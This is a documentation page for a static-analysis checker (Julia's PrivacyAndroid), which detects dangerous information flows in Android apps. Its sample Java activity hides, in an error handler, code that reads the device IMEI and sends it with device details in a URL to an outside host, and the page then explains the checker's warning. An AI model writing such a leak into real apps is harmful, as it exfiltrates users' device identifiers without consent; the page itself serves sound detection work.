Checker PrivacyAndroid   as of Julia version 2.4 (built on 23 Oct 2017)

belongs to group Advanced

Identify potential dangerous information flows in Android applications



Examples


Consider the following program:

public class MainActivity extends AppCompatActivity {
    private Button button;
    private EditText text;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        button = (Button) this.findViewById(R.id.goToSecond);
        button.setOnClickListener( new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                String writeText=text.getText().toString();
                memorizeText(writeText);
            }
        });
    }

    private void memorizeText(String writeText) {
        try {
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(this.openFileOutput("StoreMyNotes.txt", Context.MODE_PRIVATE));
            outputStreamWriter.write(writeText);
            outputStreamWriter.close();
        }
        catch (IOException e) {
            Log.d("Err",e.getMessage());
            onBugShake();
        }
    }

    private void onBugShake(){
        TelephonyManager tm =(TelephonyManager)getApplicationContext().getSystemService(Context.TELEPHONY_SERVICE);
        try {
            URL myUrl = new URL("http://www.captureIssues.com/memorize?device="+ Build.DEVICE+"&id="+ tm.getDeviceId()+"&system="+Build.VERSION.SDK_INT);
            URLConnection uc=myUrl.openConnection();
            uc.connect();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

This checker issues the following warnings:

UrlInjectionAndroid.java:38: [PrivacyAndroid: URLInjectionWarning] possible URL-injection through the 0th actual parameter of init

Let us discuss the motivation of the warning. What happens here is that sensitive information flows into the first parameter of an URL connection. The result is that the web server receives sensitive information of the device. In particular the example reports a sink of the IMEI code of the device. The source of the leak is coming from the method TelephonyManager.getDeviceId() annotated as @UntrustedDevice. At the same line the sink happens. Indeed the constructor (here comes the init) of an URL object receives a parameter that is the string representation of the URL. The parameter is annotated as @UrlTrusted then the warning is the result of tainted data flowing into the constructor parameter. The goal of the Privacy checker is similar to what performs the InjectionChecker. The Privacy checker applies the behaviours and the capabilities of the Injection checker to the Android OS context. Indeed the PrivacyChecker extends Injection, but it overwrites some options parameters. In particular the boolean @UntrustedDevice is the only true by default.